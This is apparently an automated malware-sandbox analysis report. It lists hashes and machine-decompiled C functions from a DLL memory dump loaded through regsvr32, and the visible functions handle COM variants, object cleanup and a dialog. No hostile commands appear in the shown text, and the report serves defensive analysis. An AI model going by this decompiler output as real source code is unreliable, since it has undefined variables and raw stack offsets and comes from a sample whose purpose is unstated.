Opcode Fuzzy Hash: f80ac77508f805267b706e3dc9fa2e566ffd2eeb6695f0a1e89ba64ba1fca420
Instruction Fuzzy Hash: ABF0FE71A407445BD730BB738909B47BAE5FFC5710F06092ED2458B990D6B6E441DF44

Uniqueness

Uniqueness Score: -1.00%

Function 6DA54623 Relevance: 9.4, APIs: 6, Instructions: 403
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6DA54623(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed short _t175;
				signed int _t181;
				signed short _t182;
				intOrPtr* _t184;
				void* _t186;
				signed short _t195;
				signed short _t197;
				short _t198;
				void* _t201;
				signed short _t204;
				signed short _t206;
				short _t211;
				signed short _t214;
				signed short _t216;
				short _t221;
				signed short _t226;
				long long* _t233;
				intOrPtr* _t237;
				void* _t239;
				void* _t245;
				void* _t248;
				intOrPtr* _t250;
				void* _t256;
				void* _t259;
				signed int _t262;
				signed short _t263;
				signed short _t264;
				short _t266;
				signed short _t269;
				long long* _t270;
				short _t271;
				signed short _t274;
				intOrPtr* _t275;
				long long* _t280;
				short _t281;
				signed short _t295;
				short _t308;
				short _t321;
				short _t338;
				void* _t340;
				signed short _t342;
				void* _t343;
				signed long long _t350;

				_t286 = __ecx;
				_push(0x138);
				E6DA5C876(E6DA6EE87, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t343 - 0x2c)) =  *((intOrPtr*)(_t343 + 8));
				_t340 = __ecx;
				 *(_t343 - 0x48) = 0;
				if((0 |  *((intOrPtr*)(__ecx + 0x48)) != 0x00000000) == 0) {
					L1:
					E6DA44898(_t286);
				}
				if((0 |  *((intOrPtr*)(_t340 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E6DA4BCB2(_t343 - 0x3c);
				_t342 = 3;
				 *((intOrPtr*)(_t343 - 4)) = 0;
				 *(_t343 - 0x28) = _t342;
				E6DA51FFC(0,  *((intOrPtr*)(_t340 + 0x54)),  *((intOrPtr*)(_t343 + 0xc)), _t343 - 0x28);
				if( *(_t343 - 0x28) != _t342) {
					_t175 = E6DA5039A(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc)), _t343 - 0x28);
					__eflags = _t175;
					if(_t175 == 0) {
						goto L4;
					} else {
						_t181 =  *(_t343 - 0x28) & 0x0000ffff;
						_t342 = __imp__#9;
						__eflags = _t181 - 0x81;
						if(__eflags > 0) {
							_t182 = _t181 - 0x82;
							__eflags = _t182;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t195 = _t182 - 1;
								__eflags = _t195;
								if(_t195 == 0) {
									_t197 = E6DA51D6E(_t340,  *((intOrPtr*)(_t343 + 0xc)), _t343 - 0x24);
									__eflags = _t197;
									if(_t197 != 0) {
										asm("fild qword [ebp-0x21]");
										__eflags =  *(_t343 - 0x23);
										if( *(_t343 - 0x23) > 0) {
											do {
												_t140 = _t343 - 0x23;
												 *_t140 =  *(_t343 - 0x23) - 1;
												__eflags =  *_t140;
												_t350 = _t350 /  *0x6da708a8;
											} while ( *_t140 != 0);
										}
										__eflags =  *(_t343 - 0x22);
										if( *(_t343 - 0x22) == 0) {
											asm("fchs");
										}
										 *(_t343 - 0x80) = _t350;
										_t198 = 5;
										 *((short*)(_t343 - 0x88)) = _t198;
										 *((char*)(_t343 - 4)) = 0xe;
										E6DA4BC8E(_t343 - 0x88, _t343 - 0x3c, _t343 - 0x88);
										_t201 = _t343 - 0x88;
										goto L30;
									}
								} else {
									_t204 = _t195;
									__eflags = _t204;
									if(_t204 == 0) {
										_t206 = E6DA51DA1(_t340,  *((intOrPtr*)(_t343 + 0xc)), _t343 - 0x44);
										__eflags = _t206;
										if(_t206 != 0) {
											asm("fldz");
											 *(_t343 - 0x20) = _t350;
											 *((intOrPtr*)(_t343 - 0x18)) = 0;
											E6DA50271( *(_t343 - 0x44),  *(_t343 - 0x42) & 0x0000ffff,  *(_t343 - 0x40) & 0x0000ffff);
											_t211 = 7;
											 *(_t343 - 0x70) =  *(_t343 - 0x20);
											 *((short*)(_t343 - 0x78)) = _t211;
											 *((char*)(_t343 - 4)) = 0xf;
											E6DA4BC8E(_t343 - 0x78, _t343 - 0x3c, _t343 - 0x78);
											_t201 = _t343 - 0x78;
											goto L30;
										}
									} else {
										_t214 = _t204 - 1;
										__eflags = _t214;
										if(_t214 == 0) {
											_t216 = E6DA51DA1(_t340,  *((intOrPtr*)(_t343 + 0xc)), _t343 - 0x44);
											__eflags = _t216;
											if(_t216 != 0) {
												asm("fldz");
												 *(_t343 - 0x20) = _t350;
												 *((intOrPtr*)(_t343 - 0x18)) = 0;
												E6DA5028D( *(_t343 - 0x44) & 0x0000ffff,  *(_t343 - 0x42) & 0x0000ffff,  *(_t343 - 0x40) & 0x0000ffff);
												_t221 = 7;
												 *(_t343 - 0xb0) =  *(_t343 - 0x20);
												 *((short*)(_t343 - 0xb8)) = _t221;
												 *((char*)(_t343 - 4)) = 0x10;
												E6DA4BC8E(_t343 - 0xb8, _t343 - 0x3c, _t343 - 0xb8);
												_t201 = _t343 - 0xb8;
												goto L30;
											}
										} else {
											__eflags = _t214 == 1;
											if(_t214 == 1) {
												_t226 = E6DA51DD4(_t340,  *((intOrPtr*)(_t343 + 0xc)), _t343 - 0x24);
												__eflags = _t226;
												if(_t226 != 0) {
													_t233 = E6DA51F48(_t343 - 0x144,  *((short*)(_t343 - 0x24)),  *(_t343 - 0x22) & 0x0000ffff,  *(_t343 - 0x20) & 0x0000ffff,  *(_t343 - 0x1e) & 0x0000ffff,  *(_t343 - 0x1c) & 0x0000ffff,  *(_t343 - 0x1a) & 0x0000ffff);
													_t308 = 7;
													 *((short*)(_t343 - 0xa8)) = _t308;
													 *((long long*)(_t343 - 0xa0)) =  *_t233;
													 *((char*)(_t343 - 4)) = 0x11;
													E6DA4BC8E(_t343 - 0xa8, _t343 - 0x3c, _t343 - 0xa8);
													_t201 = _t343 - 0xa8;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t237 = E6DA3D380(__eflags, E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc))));
								 *((char*)(_t343 - 4)) = 2;
								_t239 = E6DA4C03D(0, _t343 - 0x128, _t340, _t342, __eflags);
								 *((char*)(_t343 - 4)) = 3;
								E6DA4BC8E(_t239, _t343 - 0x3c, _t239);
								 *_t342(_t343 - 0x128,  *_t237, 8);
								_t295 =  *(_t343 - 0x28);
								goto L51;
							} else {
								__eflags = _t181 - 8;
								if(__eflags > 0) {
									__eflags = _t181 - 0xb;
									if(__eflags == 0) {
										_t245 = E6DA4BBBD(_t343 - 0x108,  *(E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc)))) & 0x0000ffff, 0xb);
										 *((char*)(_t343 - 4)) = 0xb;
										E6DA4BC8E(_t245, _t343 - 0x3c, _t245);
										_t201 = _t343 - 0x108;
										goto L30;
									} else {
										__eflags = _t181 - 0xc;
										if(__eflags == 0) {
											_t248 = E6DA4BF71(0, _t343 - 0xf8, _t340, E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc))));
											 *((char*)(_t343 - 4)) = 1;
											E6DA4BC8E(_t248, _t343 - 0x3c, _t248);
											_t201 = _t343 - 0xf8;
											goto L30;
										} else {
											__eflags = _t181 - 0xf;
											if(_t181 > 0xf) {
												__eflags = _t181 - 0x11;
												if(__eflags <= 0) {
													_t250 = E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc)));
													_t321 = 0x11;
													 *((short*)(_t343 - 0xc8)) = _t321;
													 *((char*)(_t343 - 0xc0)) =  *_t250;
													 *((char*)(_t343 - 4)) = 6;
													E6DA4BC8E(_t343 - 0xc8, _t343 - 0x3c, _t343 - 0xc8);
													_t201 = _t343 - 0xc8;
													goto L30;
												} else {
													__eflags = _t181 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t181 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t184 = E6DA44623(0, _t343 - 0x48, _t340, _t342, __eflags);
										 *((char*)(_t343 - 4)) = 4;
										_t186 = E6DA4C03D(0, _t343 - 0x138, _t340, _t342, __eflags);
										 *((char*)(_t343 - 4)) = 5;
										E6DA4BC8E(_t186, _t343 - 0x3c, _t186);
										 *_t342(_t343 - 0x138,  *_t184, 8, E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc))));
										_t295 =  *(_t343 - 0x48);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t343 - 4)) = 0;
										E6DA21430(_t295 + 0xfffffff0);
									} else {
										_t262 = _t181;
										__eflags = _t262;
										if(__eflags == 0) {
											L27:
											_t256 = E6DA4BBBD(_t343 - 0x118,  *(E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc)))) & 0x0000ffff, 2);
											 *((char*)(_t343 - 4)) = 7;
											E6DA4BC8E(_t256, _t343 - 0x3c, _t256);
											_t201 = _t343 - 0x118;
											goto L30;
										} else {
											_t263 = _t262 - 1;
											__eflags = _t263;
											if(__eflags == 0) {
												L26:
												_t259 = E6DA4BBF3(_t343 - 0xe8,  *(E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc)))), 3);
												 *((char*)(_t343 - 4)) = 8;
												E6DA4BC8E(_t259, _t343 - 0x3c, _t259);
												_t201 = _t343 - 0xe8;
												goto L30;
											} else {
												_t264 = _t263 - 1;
												__eflags = _t264;
												if(__eflags == 0) {
													 *(_t343 - 0x28) =  *(E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc))));
													_t266 = 4;
													 *(_t343 - 0x60) =  *(_t343 - 0x28);
													 *((short*)(_t343 - 0x68)) = _t266;
													 *((char*)(_t343 - 4)) = 9;
													E6DA4BC8E(_t343 - 0x68, _t343 - 0x3c, _t343 - 0x68);
													_t201 = _t343 - 0x68;
													goto L30;
												} else {
													_t269 = _t264 - 1;
													__eflags = _t269;
													if(__eflags == 0) {
														_t270 = E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc)));
														 *((long long*)(_t343 - 0x90)) =  *_t270;
														_t271 = 5;
														 *((short*)(_t343 - 0x98)) = _t271;
														 *((char*)(_t343 - 4)) = 0xa;
														E6DA4BC8E(_t343 - 0x98, _t343 - 0x3c, _t343 - 0x98);
														_t201 = _t343 - 0x98;
														goto L30;
													} else {
														_t274 = _t269 - 1;
														__eflags = _t274;
														if(__eflags == 0) {
															_t275 = E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc)));
															_t338 = 6;
															 *((short*)(_t343 - 0x58)) = _t338;
															 *((intOrPtr*)(_t343 - 0x50)) =  *_t275;
															 *((intOrPtr*)(_t343 - 0x4c)) =  *((intOrPtr*)(_t275 + 4));
															 *((char*)(_t343 - 4)) = 0xd;
															E6DA4BC8E(_t343 - 0x58, _t343 - 0x3c, _t343 - 0x58);
															_t201 = _t343 - 0x58;
															goto L30;
														} else {
															__eflags = _t274 - 1;
															if(__eflags == 0) {
																_t280 = E6DA503D2(_t340, __eflags,  *((intOrPtr*)(_t343 + 0xc)));
																 *((long long*)(_t343 - 0xd0)) =  *_t280;
																_t281 = 7;
																 *((short*)(_t343 - 0xd8)) = _t281;
																 *((char*)(_t343 - 4)) = 0xc;
																E6DA4BC8E(_t343 - 0xd8, _t343 - 0x3c, _t343 - 0xd8);
																_t201 = _t343 - 0xd8;
																L30:
																 *((char*)(_t343 - 4)) = 0;
																 *_t342(_t201);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E6DA4BF71(0,  *((intOrPtr*)(_t343 - 0x2c)), _t340, _t343 - 0x3c);
						 *_t342(_t343 - 0x3c);
					}
				} else {
					L4:
					E6DA4BF71(0,  *((intOrPtr*)(_t343 - 0x2c)), _t340, _t343 - 0x3c);
					__imp__#9(_t343 - 0x3c);
				}
				return E6DA5C8F9(0, _t340, _t342);
			}

0x6da54623
0x6da54623
0x6da5462d
0x6da54637
0x6da5463c
0x6da5463e
0x6da54649
0x6da5464b
0x6da5464b
0x6da5464b
0x6da5465a
0x00000000
0x00000000
0x6da54660
0x6da5466a
0x6da54672
0x6da54675
0x6da54678
0x6da54680
0x6da546a9
0x6da546ae
0x6da546b0
0x00000000
0x6da546b2
0x6da546b2
0x6da546b6
0x6da546c1
0x6da546c3
0x6da5494c
0x6da5494c
0x6da54951
0x00000000
0x6da54957
0x6da54957
0x6da54957
0x6da54958
0x6da54aa8
0x6da54aad
0x6da54aaf
0x6da54ab5
0x6da54ab8
0x6da54abb
0x6da54abd
0x6da54abd
0x6da54abd
0x6da54abd
0x6da54ac0
0x6da54ac0
0x6da54abd
0x6da54ac8
0x6da54acb
0x6da54acd
0x6da54acd
0x6da54ad1
0x6da54ad4
0x6da54ad5
0x6da54ae6
0x6da54aea
0x6da54aef
0x00000000
0x6da54aef
0x6da5495e
0x6da5495f
0x6da5495f
0x6da54960
0x6da54a4e
0x6da54a53
0x6da54a55
0x6da54a5f
0x6da54a62
0x6da54a72
0x6da54a75
0x6da54a7f
0x6da54a80
0x6da54a83
0x6da54a8e
0x6da54a92
0x6da54a97
0x00000000
0x6da54a97
0x6da54966
0x6da54966
0x6da54966
0x6da54967
0x6da549e8
0x6da549ed
0x6da549ef
0x6da549f9
0x6da549fc
0x6da54a0c
0x6da54a0f
0x6da54a19
0x6da54a1a
0x6da54a20
0x6da54a31
0x6da54a35
0x6da54a3a
0x00000000
0x6da54a3a
0x6da54969
0x6da54969
0x6da5496a
0x6da54979
0x6da5497e
0x6da54980
0x6da549aa
0x6da549b1
0x6da549b2
0x6da549bb
0x6da549cb
0x6da549cf
0x6da549d4
0x00000000
0x6da549d4
0x6da54980
0x6da5496a
0x6da54967
0x6da54960
0x6da54958
0x6da546c9
0x6da546c9
0x6da54915
0x6da54925
0x6da54929
0x6da54932
0x6da54936
0x6da54942
0x6da54944
0x00000000
0x6da546cf
0x6da546cf
0x6da546d2
0x6da547dd
0x6da547e0
0x6da548ed
0x6da548f6
0x6da548fa
0x6da548ff
0x00000000
0x6da547e6
0x6da547e6
0x6da547e9
0x6da548b4
0x6da548bd
0x6da548c1
0x6da548c6
0x00000000
0x6da547ef
0x6da547ef
0x6da547f2
0x6da547f8
0x6da547fb
0x6da54871
0x6da5487a
0x6da5487b
0x6da54882
0x6da54892
0x6da54896
0x6da5489b
0x00000000
0x6da547fd
0x6da547fd
0x6da54800
0x00000000
0x6da54802
0x6da54802
0x6da54805
0x00000000
0x00000000
0x6da54805
0x6da54800
0x6da547fb
0x6da547f2
0x6da547e9
0x6da546d8
0x6da546d8
0x6da54afa
0x6da54b08
0x6da54b18
0x6da54b1c
0x6da54b25
0x6da54b29
0x6da54b35
0x6da54b37
0x6da54b3a
0x6da54b3a
0x6da54b3d
0x6da54b40
0x6da546de
0x6da546df
0x6da546df
0x6da546e0
0x6da5483c
0x6da54852
0x6da5485b
0x6da5485f
0x6da54864
0x00000000
0x6da546e6
0x6da546e6
0x6da546e6
0x6da546e7
0x6da5480b
0x6da5481f
0x6da54828
0x6da5482c
0x6da54831
0x00000000
0x6da546ed
0x6da546ed
0x6da546ed
0x6da546ee
0x6da547b5
0x6da547bd
0x6da547be
0x6da547c1
0x6da547cc
0x6da547d0
0x6da547d5
0x00000000
0x6da546f4
0x6da546f4
0x6da546f4
0x6da546f5
0x6da54774
0x6da5477d
0x6da54783
0x6da54784
0x6da54795
0x6da54799
0x6da5479e
0x00000000
0x6da546f7
0x6da546f7
0x6da546f7
0x6da546f8
0x6da54740
0x6da5474c
0x6da5474d
0x6da54751
0x6da54754
0x6da5475e
0x6da54762
0x6da54767
0x00000000
0x6da546fa
0x6da546fa
0x6da546fb
0x6da54706
0x6da5470f
0x6da54715
0x6da54716
0x6da54727
0x6da5472b
0x6da54730
0x6da548cc
0x6da548cd
0x6da548d0
0x6da548d0
0x6da546fb
0x6da546f8
0x6da546f5
0x6da546ee
0x6da546e7
0x6da546e0
0x6da546d8
0x6da546d2
0x6da546c9
0x6da54b4c
0x6da54b55
0x6da54b55
0x6da54682
0x6da54682
0x6da54689
0x6da54692
0x6da54692
0x6da54b5f

APIs

__EH_prolog3_GS.LIBCMT ref: 6DA5462D
VariantClear.OLEAUT32(?), ref: 6DA54692

Part of subcall function 6DA44898: __CxxThrowException@8.LIBCMT ref: 6DA448AE

VariantClear.OLEAUT32(?), ref: 6DA548D0
VariantClear.OLEAUT32(?), ref: 6DA54942
VariantClear.OLEAUT32(?), ref: 6DA54B55

Part of subcall function 6DA4BC8E: VariantCopy.OLEAUT32(?,?), ref: 6DA4BC9F

Part of subcall function 6DA3D380: _DebugHeapAllocator.LIBCPMTD ref: 6DA3D3D5

Part of subcall function 6DA4C03D: __EH_prolog3.LIBCMT ref: 6DA4C047
Part of subcall function 6DA4C03D: lstrlenA.KERNEL32(?,?,?,00000224), ref: 6DA4C067
Part of subcall function 6DA4C03D: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 6DA4C06F

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Variant$Clear$AllocAllocatorByteCopyDebugException@8H_prolog3H_prolog3_HeapStringThrowlstrlen
String ID:
API String ID: 1412249591-0
Opcode ID: c7a3219c7835e97bce51c7c842caaa622a58184042abfa04e7b72605ad096016
Instruction ID: ef14c8bd20f43182bd9996f99907f554fe220f8fc1127eb7c7f035e8dd1227cd
Opcode Fuzzy Hash: c7a3219c7835e97bce51c7c842caaa622a58184042abfa04e7b72605ad096016
Instruction Fuzzy Hash: D2F17C3580C15DEACF55DB90C980BFDBB79AF0C304F058096EA49A7181DF749AE8DB21

Uniqueness

Uniqueness Score: -1.00%

Function 6DA542D7 Relevance: 9.2, APIs: 6, Instructions: 180
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6DA542D7(void* __ebx, intOrPtr __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t99;
				intOrPtr* _t119;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t141;
				intOrPtr* _t147;
				void* _t156;
				intOrPtr _t158;
				intOrPtr* _t159;
				void* _t160;
				intOrPtr _t172;

				_t155 = __edi;
				_push(0x10);
				E6DA5C80D(E6DA6EDB8, __ebx, __edi, __esi);
				_t158 = __ecx;
				 *((intOrPtr*)(_t160 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x6da73ba4;
				 *(_t160 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t158 + 0x24)) != 0) {
						_t155 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x1c)) + 8));
						__eflags = _t155;
						if(_t155 == 0) {
							break;
						}
						_t147 =  *_t155;
						__eflags = _t147;
						if(_t147 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t147 + 0xbc))( *((intOrPtr*)(_t155 + 8)), 0);
						 *((intOrPtr*)( *_t155 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t160 - 0x18)) = _t158 + 0x18;
					E6DA4AF3C(_t158 + 0x18);
					if( *((intOrPtr*)(_t158 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t158 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t158 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t158 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t158 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t134 =  *((intOrPtr*)(_t158 + 0x54));
							if( *((intOrPtr*)(_t158 + 0x54)) != 0) {
								E6DA52B2E(_t134,  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x50)))));
								E6DA4EC9C( *((intOrPtr*)(_t158 + 0x54)));
							}
							_t135 =  *((intOrPtr*)(_t158 + 0x54));
							_t184 =  *((intOrPtr*)(_t158 + 0x54));
							if( *((intOrPtr*)(_t158 + 0x54)) != 0) {
								E6DA51A36(0, _t135, _t155, _t184, 1);
							}
							_t136 =  *((intOrPtr*)(_t158 + 0x50));
							_t185 =  *((intOrPtr*)(_t158 + 0x50));
							if( *((intOrPtr*)(_t158 + 0x50)) != 0) {
								E6DA54212(0, _t136, _t155, _t185, 1);
							}
							_t86 =  *((intOrPtr*)(_t158 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t159 =  *((intOrPtr*)(_t158 + 0x48));
							if(_t159 != 0) {
								 *((intOrPtr*)( *_t159 + 8))(_t159);
							}
							 *(_t160 - 4) =  *(_t160 - 4) | 0xffffffff;
							return E6DA5C8E5(E6DA4B04C( *((intOrPtr*)(_t160 - 0x18))));
						} else {
							 *((intOrPtr*)(_t160 - 0x10)) = 0;
							if( *((intOrPtr*)(_t158 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t158 + 0x14)));
								goto L32;
							}
							_t156 = 0;
							do {
								_t99 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x14)) + _t156 + 0x24)) + 4));
								 *((intOrPtr*)(_t160 - 0x14)) = _t99;
								if(_t99 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E6DA3E977(_t160 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t160 - 0x14)) != 0);
								L28:
								E6DA4AF3C( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x14)) + _t156 + 0x24)));
								_t141 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x14)) + _t156 + 0x24));
								if(_t141 != 0) {
									 *((intOrPtr*)( *_t141 + 4))(1);
								}
								 *((intOrPtr*)(_t160 - 0x10)) =  *((intOrPtr*)(_t160 - 0x10)) + 1;
								_t156 = _t156 + 0x28;
							} while ( *((intOrPtr*)(_t160 - 0x10)) <  *((intOrPtr*)(_t158 + 0x10)));
							goto L31;
						}
					}
					_t155 = 0;
					if( *((intOrPtr*)(_t158 + 0x38)) <= 0) {
						L17:
						if(_t172 != 0) {
							E6DA3D6DE(0, _t155, _t158, _t172,  *((intOrPtr*)(_t158 + 0x3c)));
							E6DA3D6DE(0, _t155, _t158, _t172,  *((intOrPtr*)(_t158 + 0x40)));
						}
						goto L19;
					}
					 *((intOrPtr*)(_t160 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t158 + 0x40)) +  *((intOrPtr*)(_t160 - 0x10)));
						 *((intOrPtr*)(_t160 - 0x10)) =  *((intOrPtr*)(_t160 - 0x10)) + 0x10;
						_t155 = _t155 + 1;
					} while (_t155 <  *((intOrPtr*)(_t158 + 0x38)));
					_t172 =  *((intOrPtr*)(_t158 + 0x38));
					goto L17;
				}
				_t119 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t119 == 0) {
					goto L11;
				}
				_t120 =  *_t119;
				_push(_t160 - 0x14);
				_push(0x6da792c8);
				_push(_t120);
				if( *((intOrPtr*)( *_t120))() < 0) {
					goto L11;
				}
				_t122 =  *((intOrPtr*)(_t160 - 0x14));
				if(_t122 == 0) {
					goto L11;
				}
				_push(_t160 - 0x10);
				_push(0x6da794e8);
				 *((intOrPtr*)(_t160 - 0x10)) = 0;
				_push(_t122);
				if( *((intOrPtr*)( *_t122 + 0x10))() >= 0) {
					_t126 =  *((intOrPtr*)(_t160 - 0x10));
					if(_t126 != 0) {
						 *((intOrPtr*)( *_t126 + 0x18))(_t126,  *((intOrPtr*)(__ecx + 0x58)));
						_t128 =  *((intOrPtr*)(_t160 - 0x10));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
					}
				}
				_t124 =  *((intOrPtr*)(_t160 - 0x14));
				 *((intOrPtr*)( *_t124 + 8))(_t124);
				goto L11;
			}

0x6da542d7
0x6da542d7
0x6da542de
0x6da542e3
0x6da542e5
0x6da542e8
0x6da542f0
0x6da542f6
0x00000000
0x6da5437c
0x6da5435b
0x6da5435e
0x6da54360
0x00000000
0x00000000
0x6da54362
0x6da54364
0x6da54366
0x00000000
0x00000000
0x6da5436e
0x6da54376
0x6da54376
0x6da54384
0x6da54387
0x6da5438f
0x6da543c9
0x6da543c9
0x6da543ce
0x6da543d3
0x6da543d3
0x6da543d6
0x6da543db
0x6da543e0
0x6da543e0
0x6da543e6
0x6da54455
0x6da54455
0x6da5445a
0x6da5445d
0x6da5445d
0x6da54463
0x6da54468
0x6da5446f
0x6da54477
0x6da54477
0x6da5447c
0x6da5447f
0x6da54481
0x6da54485
0x6da54485
0x6da5448a
0x6da5448d
0x6da5448f
0x6da54493
0x6da54493
0x6da54498
0x6da5449d
0x6da544a2
0x6da544a2
0x6da544a5
0x6da544aa
0x6da544af
0x6da544af
0x6da544b5
0x6da544c3
0x6da543e8
0x6da543eb
0x6da543ee
0x6da5444c
0x6da5444f
0x00000000
0x6da5444f
0x6da543f0
0x6da543f2
0x6da543f9
0x6da543fc
0x6da54401
0x00000000
0x00000000
0x00000000
0x00000000
0x6da54403
0x6da54403
0x6da54415
0x6da5441b
0x6da54420
0x6da54427
0x6da5442f
0x6da54435
0x6da5443b
0x6da5443b
0x6da5443e
0x6da54444
0x6da54447
0x00000000
0x6da543f2
0x6da543e6
0x6da54391
0x6da54396
0x6da543b5
0x6da543b5
0x6da543ba
0x6da543c2
0x6da543c8
0x00000000
0x6da543b5
0x6da54398
0x6da5439b
0x6da543a2
0x6da543a8
0x6da543ac
0x6da543ad
0x6da543b2
0x00000000
0x6da543b2
0x6da542fc
0x6da54301
0x00000000
0x00000000
0x6da54303
0x6da5430a
0x6da5430b
0x6da54310
0x6da54315
0x00000000
0x00000000
0x6da54317
0x6da5431c
0x00000000
0x00000000
0x6da54321
0x6da54322
0x6da54327
0x6da5432c
0x6da54332
0x6da54334
0x6da54339
0x6da54341
0x6da54344
0x6da5434a
0x6da5434a
0x6da54339
0x6da5434d
0x6da54353
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 6DA542DE
VariantClear.OLEAUT32(?), ref: 6DA543A2
CoTaskMemFree.OLE32(?), ref: 6DA5444F
CoTaskMemFree.OLE32(?), ref: 6DA5445D
ctype.LIBCPMT ref: 6DA54485
ctype.LIBCPMT ref: 6DA54493

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: FreeTaskctype$ClearH_prolog3Variant
String ID:
API String ID: 151822039-0
Opcode ID: db2e36e661c9f9da27e253554cee672c831bdb7d5937c371c5e318851015a16c
Instruction ID: 6252a1f26ecf7d6cd1f7f08b6b4fe8b50e05600307cbd9d714d125e4b41c1c23
Opcode Fuzzy Hash: db2e36e661c9f9da27e253554cee672c831bdb7d5937c371c5e318851015a16c
Instruction Fuzzy Hash: 67717A79608706CFDB20CFA4C9C486EB3F1BF48304715486CE256DBA20CBB1E8A1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA47BCA Relevance: 9.1, APIs: 6, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6DA47BCA(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t60;
				signed int _t65;
				signed int _t68;
				struct HWND__* _t69;
				signed int _t72;
				signed int _t102;
				signed int _t115;
				DLGTEMPLATE* _t116;
				struct HWND__* _t117;
				intOrPtr* _t119;
				void* _t120;

				_t114 = __edi;
				_t96 = __ecx;
				_push(0x3c);
				E6DA5C840(E6DA6E541, __ebx, __edi, __esi);
				_t119 = __ecx;
				 *((intOrPtr*)(_t120 - 0x20)) = __ecx;
				_t124 =  *(_t120 + 0x10);
				if( *(_t120 + 0x10) == 0) {
					 *(_t120 + 0x10) =  *(E6DA4984E(0, __edi, __ecx, _t124) + 0xc);
				}
				_t115 =  *(E6DA4984E(0, _t114, _t119, _t124) + 0x3c);
				 *(_t120 - 0x28) = _t115;
				 *(_t120 - 0x14) = 0;
